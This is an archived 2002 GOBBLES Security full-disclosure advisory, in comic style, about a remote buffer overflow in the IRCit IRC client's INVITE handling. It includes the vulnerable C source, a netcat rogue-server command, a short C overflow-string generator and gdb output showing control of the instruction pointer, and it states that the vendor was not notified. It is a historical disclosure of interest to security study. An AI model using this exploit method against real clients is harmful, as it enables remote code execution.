Remote Hole in IRC Client and Stuff

From: gobblesat_private
Date: Wed Jun 12 2002 - 08:27:59 PDT

  • Next message: Stuart Adamson: "RE: Phone Switches + telephone banking etc"

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    GOBBLES (http://www.bugtraq.org)
    ================================
    
    GOBBLES Security Labs (GSL) is currently the largest non-profit security
    team in the world, with over 17 active members that are dedicated to
    bringing cutting edge material to the public that other groups are too
    afraid and/or selfish to do.  Unlike some groups, GSL is at least honest
    about their intentions -- GSL members want fame and glory.  We're not
    out to make friends (re: fat kid).
    
     ____________________
    < GOBBLES LOVE ROUTE >
     --------------------
      \                                  ,+*^^*+___+++_
       \                           ,*^^^^              )
        \                       _+*                     ^**+_
         \                    +^       _ _++*+_+++_,         )
                  _+^^*+_    (     ,+*^ ^          \+_        )
                 {       )  (    ,(    ,_+--+--,      ^)      ^\
                { (@)    } f   ,(  ,+-^ __*_*_  ^^\_   ^\       )
               {:;-/    (_+*-+^^^^^+*+*<_ _++_)_    )    )      /
              ( /  (    (        ,___    ^*+_+* )   <    <      \
               U _/     )    *--<  ) ^\-----++__)   )    )       )
                (      )  _(^)^^))  )  )\^^^^^))^*+/    /       /
              (      /  (_))_^)) )  )  ))^^^^^))^^^)__/     +^^
             (     ,/    (^))^))  )  ) ))^^^^^^^))^^)       _)
              *+__+*       (_))^)  ) ) ))^^^^^^))^^^^^)____*^
              \             \_)^)_)) ))^^^^^^^^^^))^^^^)
               (_             ^\__^^^^^^^^^^^^))^^^^^^^)
                 ^\___            ^\__^^^^^^))^^^^^^^^)\\
                      ^^^^^\uuu/^^\uuu/^^^^\^\^\^\^\^\^\^\
                         ___) >____) >___   ^\_\_\_\_\_\_\)
                        ^^^//\\_^^//\\_^       ^(\_\_\_\)
                          ^^^ ^^ ^^^ ^
    
    
    ABOUT THIS RELEASE
    ==================
    
    This is an emergency release.  Politics are involved.  Comic advisory
    coming soon.  Thank you for understanding situation.
    
    
    POTENTIAL REMOTE ROOT VULNERABILITY IN  IRCit IRC CLIENT (POSSIBLY MORE)
    ========================================================================
    
    Everyone knows that comprimising an IRC client is the first step in
    hacking a "secure" operating system developer's personal IRC shell
    server.  Hence this leads to the first of few steps to gain root on such
    a machine.
    
    GOBBLES Security members have found an exploitable remote vulnerability
    in the IRCit IRC Client, which can be downloaded from:
    	http://www.asymmetrica.com/software/ircit/
    
    IRCit is very dangerous software in all respects. As it claims to be IRC
    client for Information Terrorists. Proceed with caution and extreme
    prejudice. For details read rest of advisory hehehe ;PPppPPPP
    
    
    SOFTWARE VERSIONS AFFECTED
    ==========================
    . . . at least the Current version, turkey not going to waste he time
          and take look at old versions to post big long useless list of
          all vulnerable versions, and likewise not going to look for same
          bug occuring in clients and clients derived from this client, and
          clients derived from same client this one was derived from, this
          is task for Team Bugtraq (bugtraqat_private) and for Team
          Vuln-Dev (vuln-devat_private) to do.  GOBBLES not going to
          waste he time, when there political agenda to be taken care of in
          this advisory.
    
    
    MISCELLANEOUS ERRATA
    ====================
    
    First, it was brought to the world's attention here that monkey.org had
    been comprimised and dugsong distributions were backdoored [1].
    
    Then, here [2] we see doug sniff talking about how his server was
    comprimised, and he mentions a REMOTE CLIENT SIDE HOLE in a popular IRC
    client Epic[3], which was used in the hack of his server (or crack, if
    you have too much ego to admit to being comprimised by someone more
    skilled than yourself, as the case seems to be).
    
    We like to quote useless IETF drafts [4] and RFC's [5] in our advisories
    and other publications to show off that we're smart and read a lot of
    worthless papers, like real skilled geeks do.
    
    After reading this, GOBBLES Security members did visit www.epicsol.org
    and looked for information about this dastardly remote exploit that
    aides in the remote root comprimise of an OpenBSD developers and self
    proclaimed security expert's personal machine, and found no mention of a
    vulnerability, including no mention of it in the CHANGELOG[6].
    
    Members of GOBBLES Security then tried to contact doug sniff via email [7],
    who ignored our inquries concerning the bug.
    
    We then approached whitehat[8] w00w00 leader Shok[9] to see if he could
    share any details on this w00w00-known 0day vulnerability in one of the
    most popular IRC clients.  He also refused to even acknowledge us.
    
    Members of GOBBLES Security then attempted to post to mailing lists,
    such as bugtraq[10] and vulndev[11] concerning this quasi-known
    vulnerability, and were disappointed to see that all our posts on the
    matter were rejected.
    
    We then proceeded to browse through our collection of DEAR DIARY notes
    concerning vulnerabilities that we have discovered during various audits
    that we have not yet had the time to write advisories for, to see if we
    had any information on a remote hole in Epic.  It turns out, we've yet
    to audit that client, but plan on it in the near future.
    
    We did come across notes regarding a somewhat related hole, which was
    written up into this very advisory that you are now reading.
    
    
    TECHNICAL DETAILS
    =================
    
    GOBBLES-bugsquasher.c find following situation with full alert red flags
    in IRCit serverr.c sourcecode:
    
    ...
    
    STD_IRC_SERVER(sINVITE)
    
     {
      char *n,
           *h,
           *v;
    
     if (n=splitn(&from), !from)  from="*@*";
        if (v=splitw(&rest), ((rest)&&(*rest==':')))  rest++;
    
        if ((mt_ptr->c_ignore&IG_INVITE)==0)
         {
          char s[MAXHOSTLEN];
    
           FIXIT(from);
           sprintf (s, "%s!%s", n, from);
    ...
    
    GOBBLES is not even going to comment on where he think problem is. Rogue
    IRC server that allow bad clients can allow the hijacking of IRCit information
    terrorist client by inviting he client to execute arbitrary code.
    
    EXPLOIT
    =======
    
    To exploit GOBBLES use he #1 whitehat penetrator tool netcat:
    
    $ echo ":x"'!'`./GOBBLES-invite 0xcafebabe`"@x INVITE you :#GOBBLES" | nc
    - -l -p 6667
    
    GOBBLES cut and paste he code especially for friend Al Huger:
    
    /* GOBBLES-invite.c */
    
    #include <stdio.h>
    
    int
    main(int argc, char **argv)
    {
            char heh[175], *store;
            int i;
    
            if(argc == 1) exit(0);
    
            sscanf(argv[1], "%p", &store);
            memset(heh, 'x', sizeof(heh));
            *(long *)&heh[166] = (long)store;
            *(long *)&heh[170] = (long)store;
            heh[174] = '\0';
    
            fprintf(stdout, "%s", heh);
    	exit(0);
    }
    
    When GOBBLES connect he IRCit client he notice following in resulting
    coredump:
    
    (gdb) info reg eip
    eip            0xcafebabe       0xcafebabe
    (gdb)
    
    That mean GOBBLES now have remotely exploitable bug of EPIC proportions
    in IRCit irc client for information terrorists.
    
    
    VENDOR NOTIFICATION STATUS
    ==========================
    
    GOBBLES in security for fame, not friends.  GOBBLES often criticized and
    immature method of not contacting vendor/programmer team come into play
    once more today, and this advisory sent out without any notification.
    Please divert flames from /dev/null stuff and send them to
    GOBBLESat_private so we all can sit in #!GOBBLES on irc looking at
    angry mails from critics calling us immature and stuff.
    
    
    GREETZ
    ======
    
    all of w00w00, all of monkey.org, friends from Summercon 2002 (When are
    videos going to get put online of GOBBLES speech?!!? HURRY THIS
    EMERGENCY!#) including everyone whose name that GOBBLES already forget,
    especially nice people who buy dinner for GOBBLES, gweeds (thanks for
    free redbull), sl0ppy for being ethical and reading our email (hehe we
    love you anyway, GOBBLES still beat you in Greatest Hacks competition by
    one place though!!!), twd for discussing future of GOBBLES Security in
    relation to his ezine, and to girl who apologize profusely to naked
    GOBBLES for laughing at him during speech, hehehe ;PPPPpppp
    
    Speech notes and pornography will be available online very soon from
    Summercon, hehe, "GOBBLES LOVE ROUTE" and stuff, right now GOBBLES
    working on figuring out hosting issue to thwart wget-based ddos he
    website already experience (advisory coming soon on this subject).
    
    Double standards rule.
    
    
    CLOSING
    =======
    
    Anyone who has pictures from Summercon 2002, please mail them to us
    (GOBBLESat_private), thanks!
    
    Remember, full disclosure is good, especially if political vendeta can
    be aired to the public in a w00w00 style hidden in such subtle manner as
    within security advisory.
    
    If you could provide the community with details concerning this socalled
    "Remote Root" hole in Epic, please do not hesitate to do so!  Teasing
    the academic/professional security community with rumors of exploits is
    not an appropriate action for anyone who wants to call themselves a
    whitehat!
    
    
    [1] http://archives.neohapsis.com/archives/bugtraq/2002-05/0281.html
    [2] http://archives.neohapsis.com/archives/bugtraq/2002-05/0285.html
    [3] http://www.epicsol.org
    [4] http://www.ietf.org/ids.by.wg/webdav.html
    [5] http://www.rfc-editor.org/cgi-bin/rfcdoctype.pl?loc=RFC&letsgo=1459&type=ftp&file_format=txt
    [6] http://www.epicsol.org/changelog.phtml
    [7] dugsongat_private (doug sniff)
    [8] http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0672.html
    [9] shokat_private (Matt Conover))
    [10] http://archives.neohapsis.com/archives/vuln-dev/
    [11] http://archives.neohapsis.com/archives/bugtraq/
    
    
    
    
    
    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.1
    Note: This signature can be verified at https://www.hushtools.com
    
    wlwEARECABwFAj0HaMAVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAP9+4A
    n3XI0qqEJoZURxozpAhF6uBQenmoAJ9D1bXamS844pgNzwSUM7wKIn7/1Q==
    =5s6i
    -----END PGP SIGNATURE-----
    



    This archive was generated by hypermail 2b30 : Wed Jun 12 2002 - 08:51:37 PDT